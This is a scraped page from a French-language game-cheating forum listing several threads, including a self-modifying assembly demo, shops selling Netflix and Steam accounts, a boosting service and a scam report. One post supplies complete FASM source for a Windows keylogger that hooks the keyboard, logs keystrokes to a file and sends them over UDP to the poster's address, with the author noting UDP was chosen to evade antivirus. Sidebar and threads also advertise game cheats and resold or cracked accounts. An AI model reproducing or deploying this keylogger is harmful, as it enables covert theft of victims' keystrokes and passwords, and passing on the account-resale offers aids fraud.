Salut à toi visiteur !
Inscris toi en moins de 10 secondes pour profitez pleinement du site et partager avec la communauté ! S'inscrire


Bienvenue, Visiteur
Vous devez vous enregistrer avant de pouvoir poster.

Nom d’utilisateur
  

Mot de passe
  





Rechercher dans les forums

(Recherche avancée)

Statistiques du Forum
» Membres : 71,177
» Dernier membre : Kamsse
» Sujets du forum : 5,593
» Messages du forum : 41,903

Statistiques complètes

Utilisateurs en ligne
Il y a actuellement 226 utilisateurs connectés.
» 0 Membre(s) | 219 Visiteur(s)
Semrush, Ahrefs, Bing, Yandex, UptimeRobot, Applebot, Google

Derniers sujets
⭐Onlyfans Loaded Accounts...
Forum : Vente & Achat
Dernier message : IZI4Shop
11-09-2025, 01:08
» Réponses : 8
» Affichages : 2,086
CS2 - Selling ultra priva...
Forum : Vente & Achat
Dernier message : Linux3838
09-09-2025, 19:13
» Réponses : 0
» Affichages : 102
Ultra private cheat for C...
Forum : Counter-Strike 2
Dernier message : Linux3838
09-09-2025, 19:12
» Réponses : 0
» Affichages : 107
Universal Aimbot 2.4 | VA...
Forum : Counter-Strike Source
Dernier message : Linux3838
09-09-2025, 19:00
» Réponses : 89
» Affichages : 42,137
Présentation de Linux3838
Forum : Présentations
Dernier message : Linux3838
09-09-2025, 18:59
» Réponses : 0
» Affichages : 91
crack gmail
Forum : Questions, aide et recherche.
Dernier message : Linux3838
09-09-2025, 18:57
» Réponses : 1
» Affichages : 856
Cherche cheat sur counter...
Forum : Questions, aide et recherche.
Dernier message : Linux3838
09-09-2025, 18:56
» Réponses : 3
» Affichages : 785
Cheat Faceit
Forum : Questions, aide et recherche.
Dernier message : Linux3838
09-09-2025, 18:55
» Réponses : 1
» Affichages : 243
EUCheats 🔥 Free Undetecte...
Forum : Counter-Strike 2
Dernier message : Diaablos34460
27-08-2025, 17:47
» Réponses : 10
» Affichages : 3,241
Valthrun (kernel cheat)
Forum : Counter-Strike 2
Dernier message : UzGz
27-08-2025, 09:55
» Réponses : 0
» Affichages : 249

 
  code auto-modifiant asm
Posté par : xddj - 23-02-2019, 22:25 - Forum : Python, PHP, Java et autres. - Pas de réponse

Bonjour,

J'ai déjà posté ce code sur le site Developpez mais je tiens à vous le faire partager vu que je l'avais bien commenté, ça pourra aider les débutants à comprendre.
Ce code est à regarder au débugger, sinon vous pigerez que dal. Je vous recommande "Immunity debugger' selon moi le meilleur.
ps: Tout les codes asm que j'ai posté sur ce forum son à compiler avec Fasm.

Code :
format PE console 5.0
include 'include/windows/win32a.inc'
 
;--------------------------------------------------
section '.text' code readable writeable executable
;--------------------------------------------------
 
entry $
 
    mov    edi,texte
    call    strlen
    mov    [texte_len],ecx
  begin:
    mov    esi,mod_addr
    mov    ebp,mod_addr_len
    xor    dl,dl
    not    dl
     @@:
    inc    dl
    inc    ebp
    add    esi,4
    cmp    bl,dl
    jnz    @b
 
    mov    esi,[esi]
    mov    edi,y1
    xor    ecx,ecx
    mov    cl,12            ;Padding de la zone afin d'éviter
    mov    al,0x90            ;des bytes restant de précédantes
    repnz    stosb            ;instructions.
    sub    edi,12
    mov    cl,byte [ebp]
    repnz    movsb            ;Injection d'un des "mod(nbr)".
 
    mov    esi,texte
    mov    edi,txtbuf
    mov    ecx,[texte_len]
    @re:
    mov    dl,4
     @@:
    mov    al,[esi]
    inc    esi
    ror    eax,8
    dec    dl
    jnz    @b
     y1:
    rd 3                ;Zone d'injection des "mod(nbr)".
    mov    [edi],eax
    add    edi,4
    sub    ecx,4
    jnz    @re
 
    push    ebx
    cinvoke    printf,forms,txtbuf
    cinvoke    puts,crlf
    invoke    Sleep,1000
    pop    ebx
     z1:                ;Gestion de la fonction:
    inc    bl            ;"modifier db 0,1,2,3,4,5,4,3,2,1,0"
     z2:                ;par un "inc/dec bl" automodifiant.
    cmp    bl,5
    jnz    z3
    mov    edi,z1
    mov    ax,0xCBFE        ;"dec bl" opcode.
    cmp    bl,5
    jz    @f
    sub    ah,8            ;Modificateur d'opcode en "inc bl".
     @@:
    stosw                ;Storage de l'opcode à "z1".
    mov    esi,z2
    mov    ax,0xFB80        ;"cmp bl" opcode.
    stosw                ;Storage de l'opcode à "z2".
    xor    al,al            ;"0" opcode suite.
    cmp    bl,5
    jz    @f
    add    al,5            ;"5" opcode suite.
     @@:
    stosb                ;Storage à "z2" de la suite de
     z3:                ;l'opcode "cmp bl" donc 5 ou 0.
    dec    [nbrloop]
    jnz    begin
 
    invoke    ExitProcess,0
 
 
 strlen:
    xor    ecx,ecx
    xor    al,al
     @@:
    inc    edi
    inc    ecx
    cmp    byte [edi],al
    jnz    @b
    ret
 
;-[Data]------------------------------------------------------------------
 
txtbuf rb 1024
 
texte db 'A table is a form of furniture with a flat horizontal upper surface used to support objects of interest, for storage, show, and/or manipulation. The surface must be held stable; for reasons of simplicity, this is usually done by support from below by either a column, a "base", or at least three columnar "stands". In special situations, table surfaces may be supported from a nearby wall, or suspended from above. wikipedia',0
 
texte_len dd 0
 
mod_addr dd 0,0,mod1,mod2,mod3,mod4,mod5    ;adresse opcode
mod_addr_len db 0,0,4,4,8,8,12            ;longueur opcode
 
mod1 dd 0x08C0C166                ;rol ax,8
mod2 dd 0x9010C0C1                ;rol eax,16
mod3 dd 0x08C0C166,0x9010C0C1            ;mix
mod4 dd 0x9010C0C1,0x08C0C166            ;mix
mod5 dd 0x08C0C166,0x9010C0C1,0x08C0C166    ;mix
 
nbrloop db 11
crlf db 13,10,0
 
forms db '%s',10,0
 
;-[Import]----------------------------------------------------------------
 
data import
 
library kernel32,'kernel32.dll',\
    msvcrt,'msvcrt.dll',\
    user32,'user32.dll',\
    wsock32,'ws2_32.dll'
 
include 'include/windows/api/kernel32.inc'
include 'include/windows/api/user32.inc'
include    'include/windows/api/wsock32.inc'
 
import msvcrt,\
printf,'printf',\
puts,'puts'
 
end data



Pièces jointes

.zip   code.auto.modifiant.zip
(Taille : 1.5 Ko / Téléchargements : 0)
Imprimer cet élément

  Shop => Compte Netflix (OUVERT)
Posté par : Shockware - 23-02-2019, 19:48 - Forum : Market Place Archives - Réponses (15)

[Image: yBzvfuU.png]


Bienvenue sur mon Shop ! 


j'ai décidé d'ouvrir mon Shop de compte Netflix.
j'espère que ce shop vous plaira et que vous serez satisfait de maïs service !




[Image: cUqn91t.png]

7€

[Image: jO0OjF2.png]

5,50€

[Image: ezSpOha.png]

4€

---- TOS ----

Pour les remboursements, je vous rembourse que si le compte vous le perdez dans le mois qui suit, à cause d'un changement de mot de passe.
Il est déconseillé de changer le mot de passe, du compte ou le mail ou alors de crée un profil.


Enjoy

Imprimer cet élément

  [MGE] MAIN acc prime avec knife/skins
Posté par : Akinox - 22-02-2019, 03:00 - Forum : Market Place Archives - Réponses (1)

vendu
//////////////////////////////////////////////////

Imprimer cet élément

  ACC CS GO PRIME +1200HOURS LVL STEAM 40
Posté par : Arthemis - 21-02-2019, 18:07 - Forum : Market Place Archives - Réponses (2)

-------------TOUT EST SOLDER MERCIIII------------

Imprimer cet élément

  Keylogger UDP
Posté par : xddj - 21-02-2019, 16:45 - Forum : Python, PHP, Java et autres. - Pas de réponse

Bonjour,

J'ai retrouvé dans mes archives le keylogger UDP dont j'avais parlé dans la chatbox.
Pourquoi UDP et pas TCP ? Car TCP est détecté par les antivirus mais pas UDP (en tout cas il n'y était pas il y a 5ans).
Normalement je crois qu'il fonctionne (j'ai la flemme de vérifier).
Je vois aussi qu'il y a une partie commenté sur le code, je crois que c'était pour chiffrer les données. Je dis "je crois" car ça fait 5ans que je n'ai pas codé d'asm et j'ai beaucoup de mal à relire mes codes Smile Il faut que je m'y remette.
Enfin voilà.. Vous avez juste à rajouter votre ip WAN dans 'votre_adresse_ip' puis compiler le code et ensuite c'est censé fonctionner. Ah oui, j'oubliais, c'est sur le port 13000 que ça fonctionne, mais ça c'est pareil vous pouvez le changer dans le code.


Et il y a des trucs, je ne sais plus pourquoi je l'ai avait écrit dans le code. Par exemple ces trois lignes:

titre db 'titre',0
message1 db '1',0
message2 db '2',0

Je crois que vous pouvez les supprimer, tout comme ces trois lignes qui me servaient à faire des printf:

formd db '%08d',13,10,0
formh db '%08x',13,10,0
forms db '%s',13,10,0

Voilà le code: (celui ci n'est pas commenté, désolé. Gardez à l'esprit que c'est un code qui n'est pas terminé...)

Code :
format PE GUI
include 'include/windows/win32a.inc'

;--------------------------------------------------
section '.flat' code readable writeable executable
;--------------------------------------------------

entry $
    invoke    CreateThread,0,0,Injection,0,0,dwthread
    or    eax,eax
    jz    exit

    invoke    WaitForSingleObject,eax,0xffffffff


Injection:
    invoke    GetModuleHandle,0
    or    eax,eax
    jz    exit

    invoke    SetWindowsHookEx,WH_KEYBOARD_LL,Keyhook,eax,0
    mov    [HHOOK],eax

    invoke    GetMessage,msg,NULL,0,0

    invoke    UnhookWindowsHookEx,[HHOOK]
    ret


proc Keyhook nCode,wParam,lParam

    cmp    [nCode],HC_ACTION
    jnz    callnexthook
    cmp    [wParam],WM_SYSKEYDOWN
    jz    @f
    cmp    [wParam],WM_KEYDOWN
    jnz    callnexthook

     @@:
    mov    eax,[lParam]

    virtual at eax
      _vkCode    dd ?
      _scanCode    dd ?
      _flags    dd ?
      _time        dd ?
      _dwExtraInfo    dd ?
    end virtual

    mov    eax,[_vkCode]
    mov    [vkCode],eax

    mov    esi,lowercase

    invoke    GetKeyState,0xa5
    cmp    ah,0xff
    jnz    @f
    mov    esi,altgrcase
     @@:
    invoke    GetKeyState,0xa0
    cmp    ah,0xff
    jz    @f

    invoke    GetKeyState,0xa1
    cmp    ah,0xff
    jz    @f

    invoke    GetKeyState,0x14
    cmp    ax,0x0001
    jnz    Keyscan
     @@:
    mov    esi,uppercase

Keyscan:
    mov    eax,[vkCode]
    mov    edi,vkcode

    xor    ecx,ecx
    add    cl,63
    cld
    repne    scasb
    or    cl,cl
    jz    callnexthook
    sub    cl,63
    not    cl
    add    si,cx
    lodsb

;    shl    ax,8
;    mov    esi,c128
;    add    esi,[cmpt]
;    inc    [cmpt]
;    cmp    [cmpt],16
;    jnz    @f
;    xor    [cmpt],16
;     @@:
;    lodsb
;    cmp    al,ah
;    jz    @f
;    xor    al,ah
;     @@:
    mov    byte [writebuf],al

    invoke    CreateFile,FilePath,GENERIC_WRITE,0,0,\
        OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
    mov    [hFile],eax

    invoke    SetFilePointer,[hFile],0,0,FILE_END

    invoke    WriteFile,[hFile],writebuf,0x1,BytesNbr,0

    invoke    GetFileSize,[hFile],0
    mov    [nSize],eax

    invoke    CloseHandle,[hFile]

    cmp    [nSize],50
    jna    callnexthook

    call    Network

callnexthook:
    invoke    CallNextHookEx,[HHOOK],[wParam],[lParam]
    ret
endp



Network:
    invoke    WSAStartup,0x202,wsadata

    mov    word [sockaddr],AF_INET

    mov    cx,13000
    rol    cx,8
    mov    word [sockaddr+2],cx

    invoke    inet_addr,ip_addr
    mov    dword [sockaddr+4],eax

    invoke    socket,AF_INET,SOCK_DGRAM,IPPROTO_UDP
    mov    [sock],eax

    invoke    CreateFile,FilePath,GENERIC_READ,0,0,\
        OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
    mov    [hFile],eax

    invoke    GetFileSize,[hFile],0
    mov    [nSize],eax

    invoke    ReadFile,[hFile],readbuf,[nSize],BytesNbr,0

    invoke    CloseHandle,[hFile]

    invoke    sendto,[sock],readbuf,[nSize],0,sockaddr,16

    ret

   exit:
    invoke    ExitProcess,0



;-[Data]-------------------------------------------

titre db 'titre',0
message1 db '1',0
message2 db '2',0

formd db '%08d',13,10,0
formh db '%08x',13,10,0
forms db '%s',13,10,0

c128 db 0x7d,0x72,0x6f,0xd7,0x84,0x09,0xb2,0x18,\
    0x12,0xd7,0x43,0xf3,0x33,0x1b,0xa4,0x6f,0


cmpt dd 0
msg MSG

hFile dd 0
FilePath db 'file.txt',0
writebuf db 0
BytesNbr dd 0
nSize dd 0

dwthread dd 0
HHOOK dd 0

vkCode dd 0

altgrcase db 0x00,0x00,0xa4,0x00,0x00,0x00,0x00,0x00,\
         0x00,0x7d,0x5d,0x00,0x23,0x7b,0x5b,0x7c,\
         0x5c,0x7e,0x60,0x5e,0x40,0

uppercase db 0x0a,0x20,0xa3,0x25,0xb5,0x3f,0x2e,0x2f,\
         0xa7,0x2b,0xb0,0x31,0x33,0x34,0x35,0x36,\
         0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
         0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
         0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
         0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x30,\
         0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
         0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0

lowercase db 0x0a,0x20,0x24,0xf9,0x2a,0x2c,0x3b,0x3a,\
         0x21,0x3d,0x29,0x26,0x22,0x27,0x28,0x2d,\
         0x5f,0xe9,0xe8,0xe7,0xe0,0x61,0x62,0x63,\
         0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x6b,\
         0x6c,0x6d,0x6e,0x6f,0x70,0x71,0x72,0x73,\
         0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x30,\
         0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
         0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0

vkcode db 0x0d,0x20,0xba,0xc0,0xdc,0xbc,0xbe,0xbf,\
      0xdf,0xbb,0xdb,0x31,0x33,0x34,0x35,0x36,\
      0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
      0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
      0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
      0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x60,\
      0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,\
      0x69,0x6a,0x6b,0x6d,0x6e,0x6f,0



wsadata WSADATA
sock dd ?
sockaddr rb 16
ip_addr db 'votre_adresse_ip',0
readbuf rb 64


;-[Import]-----------------------------------------

data import

library kernel32,'kernel32.dll',\
    msvcrt,'msvcrt.dll',\
    user32,'user32.dll',\
    wsock32,'ws2_32.dll'

include 'include/windows/api/kernel32.inc'
include 'include/windows/api/user32.inc'
include    'include/windows/api/wsock32.inc'

import msvcrt,\
printf, 'printf'

end data

Imprimer cet élément

Exclamation Signalement #20 | Membre: Igrez et (jordan22/iAce)
Posté par : Punisher59 - 21-02-2019, 14:43 - Forum : Archives des conflits - Réponses (1)

URL du membre
https://forum.cs-hackers.com/User-Felq

URL du membre (Steam)
https://forum.cs-hackers.com/User-Felq

Déroulement:
Bonjour,
J'ai été arnaqué par ces deux personnes sur le discord found shop, qui je pense doivent être les mêmes.
Premiere personne iAce qui a changé son pseudo en Jordan22 après m'avoir niqué 20 euros, en me disant que soit disant son compte est bloqué et qu'il veut que je lui donne 5 euros de plus pour débloquer son compte.
Et la 2eme personne Igrez qui m'a pris 25 euros hier soir et qui m'a supprimé du discord found Shop peu de temps après.

Screenshot de la transaction
Unknown

Imprimer cet élément

  A DELETE SVP
Posté par : Kiirl - 21-02-2019, 12:23 - Forum : Café - Réponses (29)

A DELETE SVP
up message trop court

Imprimer cet élément

  GE PRIME ACC + OE
Posté par : suchanezgame - 20-02-2019, 21:16 - Forum : Market Place Archives - Pas de réponse

Steam account w/ CS:GO 
- Rank : GE
- Nombres de victoires : ~110
- Heures de jeux sur CS:GO : ~250hrs
- Badges : Loyalty badge
- Commends : 62/59/59

50€  Paypal
Numéro non fournie 
Contact discord : rosehxze.#7232
Screen :
[Image: mnsuyn]

Imprimer cet élément

  ★[CSGO] Service de Boosting CSGO ★ Legit ★ Cheap
Posté par : leonankou - 20-02-2019, 20:55 - Forum : Services / Boosting - Réponses (3)

INTRODUCTION
Mon pseudo est Leon, je joue a tout les CS depuis de nombreuses années maintenant. Je me lance dans le boost histoire de découvrir de nombreuses choses

POURQUOI MOI ?



1/ Je suis actuellement LEM sur mon compte secondaire, et Global Elite sur mon compte principal.
2/ Je peux tout a faire comprendre la réticence que l'ont peut avoir dans ce genre de service. Mais je m'engage à fournir TOUTES les preuves nécessaire au bon fonctionnement des boosts.
3/ Le boost est 100% legit, aucun cheat/hack n'est utilisé ! 
Je suis actuellement seul, mais si j'ai de la demande, j'ai 2 amis a moi qui sont au même grade que moi.
Voici pourquoi vous devriez me choisir: 
[Image: 1550685306-20180621084656-1.jpg]



Un carry total dans quasiment tout les games où je peux jouer en LEM actuellement. J'étais MG1 sur ce compte il y a encore 10 jours.

[Image: 1550715963-csgo-poster-alt.jpg]

Toutes les vérifications au près du staff peut être effectué, il n'y a aucuns problèmes la dessus au contraire !

Cordialement !

Imprimer cet élément

  [Vendu] Compte Nulled aqua + nova [Vendu]
Posté par : MoOnKeY - 20-02-2019, 02:35 - Forum : Market Place Archives - Réponses (14)

[Vendu]

Salut,

Je vend mon compte nulled qui est Nova.
Pour avoir le nova il faut payer l'Aqua puis ensuite acheter le Nova.

[Image: unknown.png]

Prix: 20€ 

Paiement

Bitcoin, Carte PCSMastercard, Ticket Premium , Paysafecard, Skrill

Contact:

MP
Discord: Kisma7#7209

[Vendu]

Imprimer cet élément